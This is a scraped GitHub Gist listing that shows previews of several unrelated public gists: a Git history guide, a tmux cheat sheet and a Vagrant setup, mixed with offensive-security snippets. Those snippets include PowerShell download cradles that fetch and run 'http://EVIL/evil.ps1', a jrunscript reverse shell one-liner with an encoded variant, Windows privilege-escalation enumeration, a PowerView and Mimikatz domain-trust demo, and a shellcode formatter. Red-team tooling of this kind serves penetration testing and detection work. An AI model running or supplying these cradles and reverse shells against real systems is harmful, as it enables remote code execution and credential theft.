Skip to content

Instantly share code, notes, and snippets.

@tmacam
tmacam / export-process.rst
Created June 12, 2011 19:13
Short guide on how to export code to Git and tidy up its history

Exporting code to Git and tiding up its history

Author: Tiago Alves Macambira [tmacam burocarata org]
Licence:Creative Commons By-SA
@andreyvit
andreyvit / tmux.md
Created June 13, 2012 03:41
tmux cheatsheet

tmux cheat sheet

(C-x means ctrl+x, M-x means alt+x)

Prefix key

The default prefix is C-b. If you (or your muscle memory) prefer C-a, you need to add this to ~/.tmux.conf:

remap prefix to Control + a

@sckalath
sckalath / windows_privesc
Last active June 4, 2024 07:55
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active June 18, 2024 17:59
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@gfoss
gfoss / PowerShell Command Line Logging
Last active August 4, 2023 18:02
Detect and alert on nefarious PowerShell command line activity
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions
Log Source Type:
MS Event Log for Win7/Win8/2008/2012 - PowerShell
Add this file to your PowerShell directory to enable verbose command line audit logging
profile.ps1
$LogCommandHealthEvent = $true
$LogCommandLifeCycleEvent = $true
@HarmJ0y
HarmJ0y / PowerView-2.0-tricks.ps1
Last active May 13, 2024 06:52
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active December 13, 2023 15:02
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@maxivak
maxivak / _readme.md
Last active June 8, 2022 06:19
Vagrant with Ubuntu 16.04 in VirtualBox

Setup Ubuntu 16.04 to be used with Vagrant and Virtualbox

Prepare Vagrant box with Ubuntu 16.04

We will use official box "ubuntu/xenial64" and modify it to work with Vagrant.

  • Vagrantfile
@HarmJ0y
HarmJ0y / 44con_demo.ps1
Created September 17, 2016 21:00
Demo for the 44con "Trusts You Might Have Missed" presentation
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1
# map all reachable domain trusts
Invoke-MapDomainTrust
# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName
import binascii
import sys
file_name = sys.argv[1]
with open (file_name) as f:
hexdata = binascii.hexlify(f.read())
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
shellcode = ''
for i in hexlist:
shellcode += "0x{},".format(i)